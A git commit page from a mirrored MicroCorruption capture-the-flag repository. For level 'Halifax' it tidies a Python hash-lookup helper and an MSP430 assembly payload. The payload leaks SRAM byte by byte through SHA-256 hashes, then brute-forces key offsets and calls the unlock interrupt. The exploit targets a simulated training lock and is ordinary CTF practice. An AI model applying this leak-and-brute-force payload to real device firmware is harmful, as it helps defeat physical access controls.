mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-24 13:06:00 +00:00
25-Halifax: Fix typo in script, update payload for clarity and INT 0x42
This commit is contained in:
parent
7dac5d6586
commit
6515375694
@ -50,7 +50,7 @@ def main():
|
||||
key = target[loc:loc+depth]
|
||||
try:
|
||||
value = all_hashes[key]
|
||||
print(f"{value:x}", end="")
|
||||
print(f"{value:02x}", end="")
|
||||
|
||||
except KeyError:
|
||||
value = 0x00
|
||||
|
@ -5,9 +5,9 @@
|
||||
const:
|
||||
.define msize 0x1 ; length of each hash in bytes
|
||||
.define hsize 0x3 ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
|
||||
.define slen 0x140 ; number of bytes in sram to dump
|
||||
.define olen 0x3c0 ; number of bytes in hash array
|
||||
.define oaddr 0x7000 ; address of the big hash array
|
||||
.define sr_len 0x140 ; number of bytes in sram to dump
|
||||
.define ha_len 0x3c0 ; number of bytes in hash array (hsize * sr_len)
|
||||
.define haddr 0x7000 ; address of the big hash array
|
||||
.define iaddr 0x8000 ; address of the sram input buffer
|
||||
.define kaddr 0x9000 ; address of the key buffer
|
||||
external_data:
|
||||
@ -23,37 +23,27 @@ external_func:
|
||||
.define puts #0x4586
|
||||
; memcpy(void *dest, void *src, size_t len)
|
||||
.define memcpy #0x45a4
|
||||
; sha256_internal(void * sram_addr, size_t sram_len, void * sha_buf)
|
||||
; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
|
||||
.define sha256_internal #0x45b6
|
||||
; memset(void* buf, char value, size_t length)
|
||||
.define memset #0x45c8
|
||||
|
||||
setup_variables:
|
||||
push r4
|
||||
push r5
|
||||
push r6
|
||||
push r7
|
||||
mov #msize, r4 ; message_size
|
||||
mov #hsize, r5 ; bytes_per_hash
|
||||
mov #slen, r6 ; sram_length
|
||||
mov #olen, r7 ; output_length
|
||||
|
||||
get_sram_hashes:
|
||||
clr r11 ; loop variable in r11
|
||||
mov r4, r14 ; r14 = 1
|
||||
mov #oaddr, r13 ; set destination to 0x8000
|
||||
mov #msize, r14 ; r14 = 1
|
||||
mov #haddr, r13 ; set destination to 0x8000
|
||||
sr_loop:
|
||||
mov r11, r15 ; mov addr r15
|
||||
call sha256_internal; <sha256_internal>
|
||||
add r5, r13 ; keep 3 bytes of the output
|
||||
add #hsize, r13 ; keep 3 bytes of the output
|
||||
inc r11 ; inc r11
|
||||
cmp r6, r11 ; do that 0x1000 times
|
||||
cmp #sr_len, r11 ; do that 0x1000 times
|
||||
jnc sr_loop
|
||||
|
||||
print_hex:
|
||||
clr r11;
|
||||
ph_loop:
|
||||
mov.b oaddr(r11), r14
|
||||
mov.b haddr(r11), r14
|
||||
mov.b r14, r15
|
||||
rra r15 ; using rra here instead of rra.b means the value won't roll into the highest bit
|
||||
rra r15 ; which negates the need to and 0xf, r15
|
||||
@ -66,7 +56,7 @@ call putchar ; <putchar>
|
||||
mov.b HEX_LUT(r14), r15
|
||||
call putchar ; <putchar>
|
||||
inc r11 ; inc r11
|
||||
cmp r7, r11 ; do that sram_length*3 times
|
||||
cmp #ha_len, r11 ; do that sram_length*3 times
|
||||
jnc ph_loop
|
||||
|
||||
mov.b #0xa, r15 ; '\n'
|
||||
@ -75,43 +65,35 @@ call #0x4578 ; putchar ('\n')
|
||||
|
||||
take_input:
|
||||
; 3e4040003f400090b0126845
|
||||
mov r6, r14
|
||||
mov #sr_len, r14
|
||||
mov #iaddr, r15
|
||||
call getsn ; <getsn>
|
||||
|
||||
check_all_passwords:
|
||||
;for i in 0..slen:
|
||||
clr r9
|
||||
;for i in 0..sr_len:
|
||||
clr r9
|
||||
pw_loop:
|
||||
; memset(kaddr, 0, 0x20)
|
||||
mov #20, r13
|
||||
clr r14
|
||||
mov #kaddr, r15
|
||||
call memset
|
||||
|
||||
; memcpy(kaddr, iaddr + i, len)
|
||||
mov #10, r13
|
||||
mov #iaddr, r14
|
||||
add r9, r14
|
||||
mov #kaddr, r15
|
||||
call memcpy
|
||||
; sha256_internal(s_addr, len, kaddr)
|
||||
mov #kaddr, r13 ; set buffer to 0x9000
|
||||
mov #0x0010, r14 ; set length to 0x10
|
||||
mov r9, r15
|
||||
call sha256_internal
|
||||
mov #10, r13
|
||||
mov #iaddr, r14
|
||||
add r9, r14
|
||||
mov #kaddr, r15
|
||||
call memcpy
|
||||
; INT (0x42, key)
|
||||
push #kaddr
|
||||
push #42
|
||||
call INT
|
||||
add #4, sp
|
||||
; INT(7f)
|
||||
unlock7f:
|
||||
mov #0x7f, r15
|
||||
push #0
|
||||
push #0
|
||||
push #7f
|
||||
call INT
|
||||
|
||||
add #6, sp
|
||||
inc r9
|
||||
cmp r6, r9
|
||||
cmp #sr_len, r9
|
||||
jl pw_loop
|
||||
|
||||
teardown_variables:
|
||||
pop r7
|
||||
pop r6
|
||||
pop r5
|
||||
pop r4
|
||||
end:
|
||||
ret
|
||||
|
Loading…
Reference in New Issue
Block a user